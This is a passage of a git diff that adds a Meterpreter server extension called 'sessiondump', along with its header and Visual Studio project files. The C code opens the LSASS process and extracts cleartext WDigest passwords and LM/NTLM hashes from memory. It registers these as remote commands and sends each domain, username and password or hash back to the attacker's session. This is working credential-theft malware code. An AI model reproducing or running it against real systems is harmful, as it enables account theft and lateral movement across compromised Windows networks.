+DWORD getWdigestPasswords(Remote *remote, Packet *packet){
+	// Call several sub-functions in order to extract clear-text passwords
+	DWORD res = ERROR_SUCCESS;
+	LPTSTR buffer = NULL;
+	CREDS_INFOS aCredsInfos[SMALL_BUFFER_SIZE];
+	int cbSessions = 0, i = 0;
+
+	Packet *response = packet_create_response(packet);
+	buffer = calloc(LARGE_BUFFER_SIZE, sizeof(TCHAR));
+	SymbAddrTlvToStruct(packet, &symbAddr, 10);
+
+	if (!OpenLsass()){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("%s\n"), _T("[ERROR] OpenLsass() :\n\t Unable to get handle of Lsass process. This can be a problem of rights access."));
+		OutputDebugString(buffer);
+		return sendErrorTLV(ERROR_SESSIONDUMP_PROCESS, response, remote);
+	}
+
+	if (!GetDataInMemory()){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("%s\n"), _T("[ERROR] GetDataInMemory() :\n\t Fail to extract data from memory in order to uncipher passwords"));
+		OutputDebugString(buffer);
+		return sendErrorTLV(ERROR_SESSIONDUMP_GET_DATA_IN_MEMORY, response, remote);
+	}
+
+	cbSessions = GetWdigestPasswords(&aCredsInfos);
+	if (cbSessions == -1){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("%s\n"), _T("[ERROR] GetWdigestPasswords() :\n\t No session is present in LSASS memory or an unexpected error occurred"));
+		OutputDebugString(buffer);
+		return sendErrorTLV(ERROR_SESSIONDUMP_GET_WDIGEST_PASSWORDS, response, remote);
+	}
+
+	if (!CloseLsass()){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("%s\n"), _T("[ERROR] CloseLsass()"));
+		OutputDebugString(buffer);
+	}
+
+	_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Number of sessions : %d\n"), (cbSessions+1));
+	OutputDebugString(buffer);
+	OutputDebugString(_T("-----------------------------------------------------------------------------\n"));
+
+	if (cbSessions > SMALL_BUFFER_SIZE){
+		cbSessions = SMALL_BUFFER_SIZE;
+	}
+
+	for (i = 0 ; i <= cbSessions ; i++){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Session number: %d\n"), i);
+		OutputDebugString(buffer);
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("\tDomain: %s\n"), aCredsInfos[i].Domain);
+		OutputDebugString(buffer);
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("\tUsername: %s\n"), aCredsInfos[i].Username);
+		OutputDebugString(buffer);
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("\tPassword: %s\n"), aCredsInfos[i].Password);
+		OutputDebugString(buffer);
+
+		packet_add_tlv_string(response, TLV_TYPE_DOMAIN, aCredsInfos[i].Domain);
+		packet_add_tlv_string(response, TLV_TYPE_USER, aCredsInfos[i].Username);
+		packet_add_tlv_string(response, TLV_TYPE_PWD, aCredsInfos[i].Password);
+
+	}
+	OutputDebugString(_T("-----------------------------------------------------------------------------\n"));
+
+	packet_transmit_response(res, remote, response);
+	return res;
+}
+
+
+DWORD getPasswordHashes(Remote *remote, Packet *packet){
+	// Call several sub-functions in order to extract password hashes
+	DWORD res = ERROR_SUCCESS;
+	int cbSessions = 0, i = 0;
+	LPTSTR buffer = NULL;
+	CREDS_INFOS aCredsInfos[SMALL_BUFFER_SIZE];
+
+	Packet *response = packet_create_response(packet);
+	buffer = calloc(LARGE_BUFFER_SIZE, sizeof(TCHAR));
+	SymbAddrTlvToStruct(packet, &symbAddr, 9);
+
+	if (!OpenLsass()){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("%s\n"), _T("[ERROR] OpenLsass() :\n\t Fail to get handle of Lsass process. This can be a problem of rights access."));
+		OutputDebugString(buffer);
+		return sendErrorTLV(ERROR_SESSIONDUMP_PROCESS, response, remote);
+	}
+
+	if (!GetDataInMemory()){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("%s\n"), _T("[ERROR] GetDataInMemory() :\n\t Fail to extract data from memory in order to uncipher passwords"));
+		OutputDebugString(buffer);
+		return sendErrorTLV(ERROR_SESSIONDUMP_GET_DATA_IN_MEMORY, response, remote);
+	}
+
+	cbSessions = GetHashes(&aCredsInfos);
+	if (cbSessions == -1){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("%s\n"), _T("[ERROR] GetHashes() :\n\t No session is present in LSASS memory or an unexpected error occurred"));
+		OutputDebugString(buffer);
+		return sendErrorTLV(ERROR_SESSIONDUMP_GET_HASHES, response, remote);
+	}
+
+	if (!CloseLsass()){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("%s\n"), _T("[ERROR] CloseLsass()"));
+		OutputDebugString(buffer);
+	}
+	
+	_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Number of sessions: %d\n"), (cbSessions+1));
+	OutputDebugString(buffer);
+	OutputDebugString(_T("-----------------------------------------------------------------------------\n"));
+
+	if (cbSessions > SMALL_BUFFER_SIZE){
+		cbSessions = SMALL_BUFFER_SIZE;
+	}
+
+	for (i = 0 ; i <= cbSessions ; i++){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Session number: %d\n"), i);
+		OutputDebugString(buffer);
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("\tDomain: %s\n"), aCredsInfos[i].Domain);
+		OutputDebugString(buffer);
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("\tUsername: %s\n"), aCredsInfos[i].Username);
+		OutputDebugString(buffer);
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("\tLM: %s\n"), aCredsInfos[i].LMhash);
+		OutputDebugString(buffer);
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("\tNTLM: %s\n"), aCredsInfos[i].NTLMhash);
+		OutputDebugString(buffer);
+
+		packet_add_tlv_string(response, TLV_TYPE_DOMAIN, aCredsInfos[i].Domain);
+		packet_add_tlv_string(response, TLV_TYPE_USER, aCredsInfos[i].Username);
+		packet_add_tlv_string(response, TLV_TYPE_LM, aCredsInfos[i].LMhash);
+		packet_add_tlv_string(response, TLV_TYPE_NTLM, aCredsInfos[i].NTLMhash);
+	}
+	OutputDebugString(_T("-----------------------------------------------------------------------------\n"));
+
+	packet_transmit_response(res, remote, response);
+	return res;
+};
+
+
+DWORD getDllVersion(Remote *remote, Packet *packet){
+	// Get version of a DLL file
+	DWORD res = ERROR_SUCCESS;
+	DWORD dwFileVersionSize;
+	LPBYTE lpFileVersionInfo = NULL;
+	VS_FIXEDFILEINFO *lpFileInfo = NULL;
+	UINT lpFileInfoSize = 0;
+	LPBYTE dllpath = NULL, systemroot = NULL;
+	char lpszDllVersion[SMALL_BUFFER_SIZE];
+
+	Packet *response = packet_create_response(packet);
+	PCHAR dll_name = packet_get_tlv_value_string(packet, TLV_TYPE_VERSION_DLL_REQUEST);
+
+	dllpath = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SMALL_BUFFER_SIZE);
+	systemroot = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SMALL_BUFFER_SIZE);
+
+	// get absolute path to DLL in system32 directory
+	GetEnvironmentVariable(_T("systemroot"), systemroot, SMALL_BUFFER_SIZE);
+	_sntprintf_s(dllpath, SMALL_BUFFER_SIZE, _TRUNCATE, _T("%s\\System32\\%s"), systemroot, dll_name);
+	OutputDebugString(dllpath);
+
+	// get DLL version
+	dwFileVersionSize = GetFileVersionInfoSize(_T(dllpath), NULL);
+	if (dwFileVersionSize){
+		lpFileVersionInfo = (LPBYTE) calloc(dwFileVersionSize, sizeof(BYTE));
+		if (GetFileVersionInfo(_T(dllpath), NULL, dwFileVersionSize, lpFileVersionInfo)){
+			if (VerQueryValue(lpFileVersionInfo, _T("\\"), &lpFileInfo, &lpFileInfoSize)){
+				_sntprintf_s(lpszDllVersion, SMALL_BUFFER_SIZE, _TRUNCATE, _T("%d.%d.%d.%d"), HIWORD(lpFileInfo->dwFileVersionMS), LOWORD(lpFileInfo->dwFileVersionMS), \
+				HIWORD(lpFileInfo->dwFileVersionLS), LOWORD(lpFileInfo->dwFileVersionLS));
+			}
+		}
+	}
+	
+	packet_add_tlv_string(response, TLV_TYPE_VERSION_DLL_ANSWER, lpszDllVersion);
+	packet_transmit_response(res, remote, response);
+
+	lpFileInfo = NULL;
+	if (lpFileVersionInfo) free(lpFileVersionInfo); lpFileVersionInfo = NULL;
+	if (dllpath) HeapFree(GetProcessHeap(), 0, dllpath); dllpath = NULL;
+	if (systemroot) HeapFree(GetProcessHeap(), 0, systemroot); systemroot = NULL;
+	return res;
+};
+
+
+Command customCommands[] =
+{
+	{ "getHashes",
+	{ getPasswordHashes,						{ 0 }, 0 },
+	{ EMPTY_DISPATCH_HANDLER                      },
+	},
+
+	{ "getWdigestPasswords",
+	{ getWdigestPasswords,						{ 0 }, 0 },
+	{ EMPTY_DISPATCH_HANDLER                      },
+	},
+
+	{ "getDllVer",
+	{ getDllVersion,							{ 0 }, 0 },
+	{ EMPTY_DISPATCH_HANDLER                      },
+	},
+
+	// Terminator
+	{ NULL,
+	  { EMPTY_DISPATCH_HANDLER                      },
+	  { EMPTY_DISPATCH_HANDLER                      },
+	},
+};
+
+/*
+ * Initialize the server extension
+ */
+DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
+{
+	DWORD index;
+
+	hMetSrv = remote->hMetSrv;
+
+	for (index = 0;
+	     customCommands[index].method;
+	     index++)
+		command_register(&customCommands[index]);
+
+	return ERROR_SUCCESS;
+}
+
+/*
+ * Deinitialize the server extension
+ */
+DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
+{
+	DWORD index;
+
+	for (index = 0;
+	     customCommands[index].method;
+	     index++)
+		command_deregister(&customCommands[index]);
+
+	return ERROR_SUCCESS;
+}
diff --git a/external/source/meterpreter/source/extensions/sessiondump/sessiondump.h b/external/source/meterpreter/source/extensions/sessiondump/sessiondump.h
new file mode 100755
index 000000000000..5e3f07ed8ec9
--- /dev/null
+++ b/external/source/meterpreter/source/extensions/sessiondump/sessiondump.h
@@ -0,0 +1,74 @@
+#ifndef _METERPRETER_SOURCE_EXTENSION_SESSIONDUMP_SESSIONDUMP_H
+
+#include "core.h"
+
+#define _METERPRETER_SOURCE_EXTENSION_SESSIONDUMP_SESSIONDUMP_H
+#define TLV_TYPE_EXTENSION_SESSIONDUMP	0
+
+// Error codes to communicate with Meterpreter when something fail
+#define ERROR_SESSIONDUMP_PROCESS 1
+#define ERROR_SESSIONDUMP_GET_DATA_IN_MEMORY 2
+#define ERROR_SESSIONDUMP_GET_HASHES 3
+#define ERROR_SESSIONDUMP_GET_WDIGEST_PASSWORDS 4
+
+#define TLV_TYPE_ERROR							\
+		MAKE_CUSTOM_TLV(						\
+				TLV_META_TYPE_UINT,				\
+				TLV_TYPE_EXTENSION_SESSIONDUMP,	\
+				TLV_EXTENSIONS + 1)
+
+#define TLV_TYPE_VERSION_DLL_REQUEST			\
+		MAKE_CUSTOM_TLV(						\
+				TLV_META_TYPE_STRING,			\
+				TLV_TYPE_EXTENSION_SESSIONDUMP, \
+				TLV_EXTENSIONS + 2)
+
+#define TLV_TYPE_VERSION_DLL_ANSWER				\
+		MAKE_CUSTOM_TLV(						\
+				TLV_META_TYPE_STRING,			\
+				TLV_TYPE_EXTENSION_SESSIONDUMP,	\
+				TLV_EXTENSIONS + 3)
+
+#define TLV_TYPE_SYMBOLS_NAME					\
+		MAKE_CUSTOM_TLV(						\
+				TLV_META_TYPE_STRING,			\
+				TLV_TYPE_EXTENSION_SESSIONDUMP,	\
+				TLV_EXTENSIONS + 4)
+
+#define TLV_TYPE_SYMBOLS_ADDR					\
+		MAKE_CUSTOM_TLV(						\
+				TLV_META_TYPE_RAW,			\
+				TLV_TYPE_EXTENSION_SESSIONDUMP,	\
+				TLV_EXTENSIONS + 5)
+
+#define TLV_TYPE_DOMAIN							\
+		MAKE_CUSTOM_TLV(						\
+				TLV_META_TYPE_STRING,			\
+				TLV_TYPE_EXTENSION_SESSIONDUMP,	\
+				TLV_EXTENSIONS + 6)
+
+#define TLV_TYPE_USER							\
+		MAKE_CUSTOM_TLV(						\
+				TLV_META_TYPE_STRING,			\
+				TLV_TYPE_EXTENSION_SESSIONDUMP,	\
+				TLV_EXTENSIONS + 7)
+
+#define TLV_TYPE_PWD						\
+		MAKE_CUSTOM_TLV(						\
+				TLV_META_TYPE_STRING,				\
+				TLV_TYPE_EXTENSION_SESSIONDUMP,	\
+				TLV_EXTENSIONS + 8)
+
+#define TLV_TYPE_LM						\
+		MAKE_CUSTOM_TLV(						\
+				TLV_META_TYPE_STRING,				\
+				TLV_TYPE_EXTENSION_SESSIONDUMP,	\
+				TLV_EXTENSIONS + 9)
+
+#define TLV_TYPE_NTLM						\
+		MAKE_CUSTOM_TLV(						\
+				TLV_META_TYPE_STRING,				\
+				TLV_TYPE_EXTENSION_SESSIONDUMP,	\
+				TLV_EXTENSIONS + 10)
+
+#endif
diff --git a/external/source/meterpreter/workspace/ext_server_sessiondump/ext_server_sessiondump.vcproj b/external/source/meterpreter/workspace/ext_server_sessiondump/ext_server_sessiondump.vcproj
new file mode 100755
index 000000000000..c6ae965d8877
--- /dev/null
+++ b/external/source/meterpreter/workspace/ext_server_sessiondump/ext_server_sessiondump.vcproj
@@ -0,0 +1,411 @@
+<?xml version="1.0" encoding="Windows-1252"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="9.00"
+	Name="ext_server_sessiondump"
+	ProjectGUID="{C427F2B9-C287-4BDA-A6BB-401FC14E207C}"
+	RootNamespace="ext_server_sessiondump"
+	Keyword="Win32Proj"
+	TargetFrameworkVersion="196613"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+		<Platform
+			Name="x64"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SESSIONDUMP_EXPORTS"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="2"
+				UsePrecompiledHeader="0"
+				WarningLevel="3"
+				DebugInformationFormat="4"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalOptions="netapi32.lib mpr.lib"
+				LinkIncremental="2"
+				GenerateDebugInformation="true"
+				SubSystem="2"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory=".\Release"
+			IntermediateDirectory=".\Release"
+			ConfigurationType="2"
+			CharacterSet="2"
+			WholeProgramOptimization="0"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="2"
+				InlineFunctionExpansion="1"
+				EnableIntrinsicFunctions="false"
+				AdditionalIncludeDirectories="..\..\source\extensions\sessiondump;..\..\source\openssl\include"
+				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SESSIONDUMP_EXPORTS"
+				StringPooling="true"
+				RuntimeLibrary="0"
+				EnableFunctionLevelLinking="true"
+				UsePrecompiledHeader="0"
+				AssemblerListingLocation=".\Release/"
+				ObjectFile=".\Release/"
+				ProgramDataBaseFileName=".\Release/"
+				WarningLevel="3"
+				DebugInformationFormat="3"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalDependencies="Netapi32.lib Mpr.lib metsrv.lib"
+				OutputFile=".\Release/ext_server_sessiondump.dll"
+				LinkIncremental="1"
+				AdditionalLibraryDirectories="..\metsrv\Release;..\..\source\openssl\lib\win"
+				GenerateManifest="false"
+				DelayLoadDLLs="metsrv.dll"
+				GenerateDebugInformation="false"
+				GenerateMapFile="true"
+				MapFileName=".\Release/ext_server_sessiondump.map"
+				SubSystem="0"
+				OptimizeReferences="0"
+				EnableCOMDATFolding="0"
+				RandomizedBaseAddress="1"
+				DataExecutionPrevention="0"
+				ImportLibrary=".\Release/ext_server_sessiondump.lib"
+				TargetMachine="1"
+				Profile="false"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+				CommandLine="copy /y &quot;$(ProjectDir)\release\ext_server_sessiondump.dll&quot; &quot;$(ProjectDir)..\..\output\&quot;"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Debug|x64"
+			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
+			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+				TargetEnvironment="3"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SESSIONDUMP_EXPORTS"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="2"
+				UsePrecompiledHeader="0"
+				WarningLevel="3"
+				DebugInformationFormat="3"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalOptions="netapi32.lib mpr.lib"
+				LinkIncremental="2"
+				GenerateDebugInformation="true"
+				SubSystem="2"
+				TargetMachine="17"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|x64"
+			OutputDirectory="$(PlatformName)\$(ConfigurationName)"
+			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			WholeProgramOptimization="0"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+				TargetEnvironment="3"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="2"
+				InlineFunctionExpansion="1"
+				EnableIntrinsicFunctions="false"
+				AdditionalIncludeDirectories="..\..\source\extensions\sessiondump;..\..\source\openssl\include"
+				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SESSIONDUMP_EXPORTS"
+				StringPooling="true"
+				RuntimeLibrary="0"
+				EnableFunctionLevelLinking="true"
+				UsePrecompiledHeader="0"
+				AssemblerListingLocation=".\Release/"
+				ObjectFile=".\Release/"
+				ProgramDataBaseFileName=".\Release/"
+				WarningLevel="3"
+				DebugInformationFormat="3"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalDependencies="Netapi32.lib Mpr.lib metsrv.lib"
+				OutputFile=".\Release\ext_server_sessiondump.x64.dll"
+				LinkIncremental="1"
+				AdditionalLibraryDirectories="..\metsrv\Release;..\..\source\openssl\lib\win"
+				GenerateManifest="false"
+				DelayLoadDLLs="metsrv.dll"
+				GenerateDebugInformation="false"
+				GenerateMapFile="true"
+				MapFileName=".\Release/ext_server_sessiondump.map"
+				SubSystem="0"
+				OptimizeReferences="0"
+				EnableCOMDATFolding="0"
+				RandomizedBaseAddress="1"
+				DataExecutionPrevention="0"
+				ImportLibrary=".\Release/ext_server_sessiondump.lib"
+				TargetMachine="17"
+				Profile="false"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+				CommandLine="copy /y &quot;$(ProjectDir)\release\ext_server_sessiondump.x64.dll&quot; &quot;$(ProjectDir)..\..\output\&quot;"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath="..\..\source\extensions\sessiondump\hash_stealer.c"
+				>
+			</File>
+			<File
+				RelativePath="..\..\source\extensions\sessiondump\sessiondump.c"
+				>
+			</File>
+			<File
+				RelativePath="..\..\source\extensions\sessiondump\list_tokens.c"
+				>
+			</File>
+			<File
+				RelativePath="..\..\source\extensions\sessiondump\token_info.c"
+				>
+			</File>
+			<File
+				RelativePath="..\..\source\extensions\sessiondump\user_management.c"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+			<File
+				RelativePath="..\..\source\extensions\sessiondump\hash_stealer.h"
+				>
+			</File>
+			<File
+				RelativePath="..\..\source\extensions\sessiondump\sessiondump.h"
+				>
+			</File>
+			<File
+				RelativePath="..\..\source\extensions\sessiondump\list_tokens.h"
+				>
+			</File>
+			<File
+				RelativePath="..\..\source\extensions\sessiondump\token_info.h"
+				>
+			</File>
+			<File
+				RelativePath="..\..\source\extensions\sessiondump\user_management.h"
+				>
+			</File>
+		</Filter>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>
diff --git a/external/source/meterpreter/workspace/ext_server_sessiondump/ext_server_sessiondump.vcxproj b/external/source/meterpreter/workspace/ext_server_sessiondump/ext_server_sessiondump.vcxproj
new file mode 100644
index 000000000000..b4e0947b5c76
--- /dev/null
+++ b/external/source/meterpreter/workspace/ext_server_sessiondump/ext_server_sessiondump.vcxproj
@@ -0,0 +1,239 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="..\..\source\extensions\sessiondump\core.h" />
+    <ClInclude Include="..\..\source\extensions\sessiondump\sessiondump.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="..\..\source\extensions\sessiondump\core.c" />
+    <ClCompile Include="..\..\source\extensions\sessiondump\sessiondump.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ProjectReference Include="..\metsrv\metsrv.vcxproj">
+      <Project>{37e24f8f-1bd9-490b-8cd2-4768b89e5eab}</Project>
+      <ReferenceOutputAssembly>false</ReferenceOutputAssembly>
+    </ProjectReference>
+    <ProjectReference Include="..\ReflectiveDLLInjection\ReflectiveDLLInjection.vcxproj">
+      <Project>{72f0246a-a38d-4547-9057-46020e8e503d}</Project>
+      <ReferenceOutputAssembly>false</ReferenceOutputAssembly>
+    </ProjectReference>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{C427F2B9-C287-4BDA-A6BB-401FC14E207C}</ProjectGuid>
+    <RootNamespace>ext_server_sessiondump</RootNamespace>
+    <Keyword>Win32Proj</Keyword>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <CharacterSet>MultiByte</CharacterSet>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <CharacterSet>MultiByte</CharacterSet>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup>
+    <_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
+    <OutDir Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">$(SolutionDir)$(Configuration)\</OutDir>
+    <IntDir Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">$(Configuration)\</IntDir>
